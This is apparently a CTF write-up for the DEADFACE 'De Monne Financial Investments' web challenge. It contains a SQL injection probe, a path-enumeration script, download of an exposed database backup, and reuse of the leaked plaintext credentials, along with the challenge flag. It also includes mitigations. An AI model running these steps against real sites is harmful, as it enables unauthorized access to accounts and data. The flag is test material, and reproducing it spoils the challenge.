Skip to content

SECURE_CONNECTION//PRESS[CTRL+J]FOR ROOT ACCESS

BACK TO INTEL
WebEasy

De Monne Financial Investments

CTF writeup for De Monne Financial Investments from deadface

//De Monne Financial Investments

Target: http://env01.deadface.io:8888 Goal: Retrieve De Monne Financial's investment information and submit the flag as deadface{$#.##}

>Overview

This writeup documents every step taken to compromise the De Monne Financial portal, identify exposed data, and exfiltrate the required investment figure used to form the flag. The attack path combines classic recon, a misconfigured backup directory, and credential reuse to reach the internal dashboard that exposes portfolio totals.

Key outcomes:

  • Located a world-readable SQL backup containing live user credentials.
  • Logged in as a finance employee using leaked credentials.
  • Identified the "Investments" card within the authenticated dashboard showing the firm’s portfolio total.
  • Submitted the flag deadface{$128493.56} derived directly from the portal.

All testing occurred against the CTF environment with explicit authorization.

>Reconnaissance

  1. Baseline enum

    bash
    curl -i http://env01.deadface.io:8888/
    • Response: 302 redirect to /login, confirming authentication gating.

  2. Login page retrieval

    bash
    curl -s http://env01.deadface.io:8888/login
    • Rendered a standard username/password form; no obvious client-side clues.

  3. Initial SQLi probes

    bash
    curl -s -i -X POST http://env01.deadface.io:8888/login \
     -d "username=' OR 1=1-- -&password=x"
    • Result: "Invalid credentials." Simple injection attempts were blocked, implying server-side sanitization or ORM usage.

  4. Hidden endpoint sweep Used a quick Python helper to brute-force common sensitive paths while recording non-404 responses.

    bash
    python - <<'PY'
import requests
base = 'http://env01.deadface.io:8888/'
for path in ['dashboard', 'backup', 'admin', 'static', '.env']:
    r = requests.get(base + path, timeout=5, allow_redirects=False)
    if r.status_code not in (302, 404):
        print(path, r.status_code, len(r.text))
PY
    • Discovery: /backup returned HTTP 308 → hinted at a directory.

>Backup Exposure & Credential Harvesting

  1. Browse the backup directory

    bash
    curl -s http://env01.deadface.io:8888/backup/
    • Listing contained demonne_backup_20251015.sql (complete SQLite dump).

  2. Download the SQL dump

    bash
    curl -s http://env01.deadface.io:8888/backup/demonne_backup_20251015.sql \
     -o /tmp/demonne_backup_20251015.sql

  3. Inspect the dump contents

    bash
    head -n 40 /tmp/demonne_backup_20251015.sql
    • Tables present: users, transactions, system_config.
    • Credentials stored in cleartext.

  4. Restore locally for easier querying (optional but convenient)

    bash
    sqlite3 /tmp/demonne.db < /tmp/demonne_backup_20251015.sql

sqlite3 /tmp/demonne.db "SELECT id, username, password, department FROM users;"
    • Relevant credential leak:
      • jreed80 : J0nnyR#ed80! (Finance department)
      • mthompson : Welcome2024!
      • sdavis : Bank$ecure99

>Authenticated Access

  1. Login as finance employee (jreed80)

    bash
    curl -s -i -X POST http://env01.deadface.io:8888/login \
     -d 'username=jreed80&password=J0nnyR#ed80!'
    • Response: HTTP 302 → /dashboard with Set-Cookie: session=...

  2. Capture the issued session cookie

    • Example cookie: session=eyJmdWxsX25hbWUiOiJKb2huYXRoYW4gUmVlZCIsInVzZXJuYW1lIjoianJlZWQ4MCJ9.aP0zzg.xDyk4x_RbWcKBpNGGBe39pEQs04

  3. Access the authenticated dashboard

    bash
    curl -s -b 'session=<captured_cookie>' http://env01.deadface.io:8888/dashboard
    • Page rendered finance metrics including the “Investments” card with value $128,493.56.

  4. Confirm additional leaked totals

    • Account Balance: $52,847.23
    • Investments: $128,493.56
    • No further deep links (e.g., /transactions, /investments) were exposed; all returned 404.

>Flag Derivation

  • Challenge requires flag format deadface{$#.##} containing the investment amount.
  • Dashboard shows the total investments as $128,493.56.
  • Therefore, the flag is:
    text
    deadface{$128493.56}

>Lessons Learned / Mitigations

  1. Public backup directory — Disable directory listing and move backups off the web root.
  2. Plaintext credentials — Hash passwords with a modern KDF and store backups securely.
  3. Least privilege — Finance users should not expose company-wide totals without additional authorization.
  4. Monitoring — Access logs should alert on downloads from /backup/.

>Appendix: Useful One-Liners

bash
# Enumerate non-404 endpoints quickly
python - <<'PY'
import requests
base='http://env01.deadface.io:8888/'
for path in ['backup', 'dashboard', 'admin', 'static']:
    r = requests.get(base + path, allow_redirects=False)
    print(path, r.status_code)
PY
bash
# Extract only investment rows from the SQL dump
grep -n 'Investment' /tmp/demonne_backup_20251015.sql
bash
# Query restored database for transaction table
sqlite3 /tmp/demonne.db "SELECT * FROM transactions;"

>Final Flag

deadface{$128493.56}